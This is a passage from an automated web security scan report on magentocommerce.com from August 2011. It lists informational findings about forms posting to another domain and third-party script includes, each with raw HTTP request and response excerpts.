Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.150. http://www.magentocommerce.com/system-requirements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.151. http://www.magentocommerce.com/translations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.152. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.153. http://www.magentocommerce.com/vi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.154. http://www.magentocommerce.com/virtual/download-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.155. http://www.magentocommerce.com/virtual/enterprise-register/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.156. http://www.magentocommerce.com/whitepaper/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
7. Cross-domain script include  previous  next
There are 8 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

7.1. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</style>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
7.2. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</style>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
7.3. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</style>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
7.4. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</style>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
7.5. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</div>
<script src="http://s.clicktale.net/WRb.js" type="text/javascript"></script>
...[SNIP]...
7.6. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</p> -->
<script type="text/javascript" src="http://ads.trafficspaces.net/v1.22/adservice.js"></script>
...[SNIP]...
</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1590726&PluID=0&w=250&h=150&ord=[timestamp]&ifrm=1&ucm=true&z=0"></script>
...[SNIP]...
7.7. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
